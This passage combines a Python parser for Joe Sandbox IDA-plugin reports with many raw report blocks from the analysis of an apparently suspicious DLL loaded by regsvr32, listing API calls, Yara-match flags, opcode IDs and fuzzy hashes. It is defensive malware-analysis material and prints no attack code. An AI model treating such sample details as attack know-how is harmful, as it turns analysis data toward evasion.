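SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?\d+(?:\.\d+)?)%")


@dataclass
class ApiRef:
    name: str
    module: str
    ref: str                    # address of the call site
    subcall_of: Optional[str]   # callee address when the call is indirect


@dataclass
class FunctionBlock:
    apis: List[ApiRef] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)
    uniqueness_score: Optional[float] = None

    def tokens(self, key: str) -> List[str]:
        """The report joins API ID and String ID items with '$'."""
        return [t for t in self.fields.get(key, "").split("$") if t]


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the listing into blocks; each ends at its 'Uniqueness Score' line."""
    blocks: List[FunctionBlock] = []
    cur, section = FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        m = SCORE_RE.match(line)
        if m:
            cur.uniqueness_score = float(m["score"])
            blocks.append(cur)
            cur, section = FunctionBlock(), None
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            cur.apis.append(ApiRef(m["name"], m["mod"], m["ref"], m["sub"]))
            continue
        m = KV_RE.match(line)
        if m:
            cur.fields[m["key"].strip()] = m["val"].strip()
    if cur.apis or cur.fields:  # listing cut off before its score line
        blocks.append(cur)
    return blocks


def blocks_calling(blocks: List[FunctionBlock], api: str) -> List[FunctionBlock]:
    """Blocks that reach the API directly or through a sub-call."""
    return [b for b in blocks if any(a.name == api for a in b.apis)]


def runtime_resolved_exports(blocks: List[FunctionBlock]) -> List[Tuple[str, str, str]]:
    """(dll, export, opcode id) for blocks whose strings pair a DLL name with
    another string, the footprint of LoadLibrary/GetProcAddress resolution."""
    out = []
    for b in blocks:
        names = b.tokens("String ID")
        dlls = [s for s in names if s.upper().endswith(".DLL")]
        for d in dlls:
            for e in (s for s in names if s not in dlls):
                out.append((d, e, b.fields.get("Opcode ID", "")))
    return out
```

Run against a full report export, the Opcode ID and Instruction Fuzzy Hash fields collected by parse_blocks are what you would feed into similarity hunting across other samples, and blocks_calling lets you locate every block that reaches a given API (Sleep, IsDebuggerPresent) including through CRT sub-calls, which the flat API ID token does not distinguish.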
APIs
• GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9DFF2
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E004
• GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E04F
• GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E0E1
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E11B
• free.LIBCMT ref: 00007FFFEFB9E12F
  • Part of subcall function 00007FFFEFB96C34: _FF_MSGBANNER.LIBCMT ref: 00007FFFEFB96C64
  • Part of subcall function 00007FFFEFB96C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFFEFB930C0,?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3), ref: 00007FFFEFB96C89
  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CAD
  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CB8
• GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFFEFB9E1C2), ref: 00007FFFEFB9E145
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
• String ID: Qr2_:g
• API String ID: 2309262205-1052752507
• Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
• Instruction ID: a5e91a8d6eb1185752f3068e23925e7acb5db671ffbb4394863164cee42ec792
• Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
• Instruction Fuzzy Hash: C351B132A08A5386EB609F21984137A73D2FB447B4F548671DA6E83BF4DF3CE8408312
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFFEFB97194,?,?,?,?,00007FFFEFB96C69,?,?,00000000,00007FFFEFB930C0), ref: 00007FFFEFB96FCF
• GetStdHandle.KERNEL32(?,?,?,?,?,00007FFFEFB97194,?,?,?,?,00007FFFEFB96C69,?,?,00000000,00007FFFEFB930C0), ref: 00007FFFEFB970DB
• WriteFile.KERNEL32 ref: 00007FFFEFB97115
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
• Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
• Instruction ID: 18134d688881f170782960e9e0dd9f2f39c054624340d0fecf816bcc16dc0321
• Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
• Instruction Fuzzy Hash: F951CE21B18A4342FB24DB25E9567BA32D6AF453B0F904236DD0D86AF6EF3CE1458202
Uniqueness

Uniqueness Score: -1.00%

APIs
• _lock.LIBCMT ref: 00007FFFEFB9E6EB
• free.LIBCMT ref: 00007FFFEFB9E7E2
  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
• ___lc_codepage_func.LIBCMT ref: 00007FFFEFB9E76B
  • Part of subcall function 00007FFFEFB96550: RtlCaptureContext.KERNEL32 ref: 00007FFFEFB9658F
  • Part of subcall function 00007FFFEFB96550: IsDebuggerPresent.KERNEL32 ref: 00007FFFEFB9662D
  • Part of subcall function 00007FFFEFB96550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96637
  • Part of subcall function 00007FFFEFB96550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96642
  • Part of subcall function 00007FFFEFB96550: GetCurrentProcess.KERNEL32 ref: 00007FFFEFB96658
  • Part of subcall function 00007FFFEFB96550: TerminateProcess.KERNEL32 ref: 00007FFFEFB96666
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
• String ID:
• API String ID: 178205154-0
• Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
• Instruction ID: 24d71c9817c895ef35ab3a35ec5e86eea76e758aa25bd23423899608774a85ec
• Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
• Instruction Fuzzy Hash: 53D1D132A0C68386E7609F24D49077A3BD6BB81760F448175DA8D937F6DF3CE8518722
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP$Qr2_:g
• API String ID: 2299586839-1853071874
• Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
• Instruction ID: eb98bd5b97270a985f19340814b925571181a9cdf7f0c72077d26bccc28d69d5
• Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
• Instruction Fuzzy Hash: AF214AA1A08A4391FA60DB20E9503BA73E0EF487A8F958131DA4D476F5EF2CE955C706
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID: Qr2_:g
• API String ID: 1445889803-1052752507
• Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
• Instruction ID: fdd17853b9b49592da433b98183f7ebb1ef000c1fea98ecb34df41016c6da8c7
• Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
• Instruction Fuzzy Hash: 49018421A29E4381EB518F21F89036573A5FB49BA0F456630DE5E477F0DF3CD8958701
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _errno$DecodePointer_lock
• String ID:
• API String ID: 2175075375-0
• Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
• Instruction ID: 93455b80a090a9308b66bccaba6f4accd5c349a83147e3a5e1d7115290df4566
• Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
• Instruction Fuzzy Hash: 31318D22B1874342FB15AA6194527BA72D6AF847A4F448434DF0C4BBF6DF3CE8118742
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
• String ID:
• API String ID: 1269745586-0
• Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
• Instruction ID: 28cf75ed4ce4b2be4b78ea9d62023203e0fee006c9fa8619fc941f9cbfead9e9
• Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
• Instruction Fuzzy Hash: 70311A72A0CB8682EA248B65E4403ABB3A4FB89754F504135DA8D43AA9EF7CD159CF01
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: "+H$1l7.$M8;$]$d$]k$]k$94
• API String ID: 0-2447245168
• Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
• Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
• Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
• Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale$_getptd
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 1743167714-1052752507
                                                                                                                                • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                • Instruction ID: 9aa35093e31948a61401df379762dfd686c72e2f3b943157d3e38c6663ed090b
                                                                                                                                • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                • Instruction Fuzzy Hash: 32616BB2B08A8797EA699E60D9453E9B3E1FB88315F404136D72D876F5CF3CE4648702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 1h$I-$IY$QL&$li7$o
                                                                                                                                • API String ID: 0-890095520
                                                                                                                                • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                                                                                • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                                • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 1$ {,$"$$-%$Rku$ i
                                                                                                                                • API String ID: 0-1845893065
                                                                                                                                • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                                                                                • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                                • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: VUS/$YV~$p$@$EX$OX
                                                                                                                                • API String ID: 0-2743166816
                                                                                                                                • Opcode ID: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                                • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                                                                                • Opcode Fuzzy Hash: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                                • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                • API String ID: 0-2100131636
                                                                                                                                • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                • API String ID: 0-2401169580
                                                                                                                                • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                • API String ID: 0-1318892062
                                                                                                                                • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                • API String ID: 0-3477398917
                                                                                                                                • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: JQ$k&($t$v$x\J
                                                                                                                                • API String ID: 0-1134872184
                                                                                                                                • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: R$)H8$?rIc$L==$V
                                                                                                                                • API String ID: 0-2512384441
                                                                                                                                • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: Qq$bt$vird$+$S
• API String ID: 0-3373980505
• Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
• Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
• Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
• Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
Uniqueness

Uniqueness Score: -1.00%

APIs
• _getptd.LIBCMT ref: 00007FFFEFB9597E
  • Part of subcall function 00007FFFEFB96550: RtlCaptureContext.KERNEL32 ref: 00007FFFEFB9658F
  • Part of subcall function 00007FFFEFB96550: IsDebuggerPresent.KERNEL32 ref: 00007FFFEFB9662D
  • Part of subcall function 00007FFFEFB96550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96637
  • Part of subcall function 00007FFFEFB96550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFEFB96642
  • Part of subcall function 00007FFFEFB96550: GetCurrentProcess.KERNEL32 ref: 00007FFFEFB96658
  • Part of subcall function 00007FFFEFB96550: TerminateProcess.KERNEL32 ref: 00007FFFEFB96666
Strings
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
• String ID: C$Qr2_:g
• API String ID: 1583075380-1992236080
• Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
• Instruction ID: 1363c8c4b60abfe07ab81e02f7d999f10acdc56a1451c16c8067f4055cbb09a6
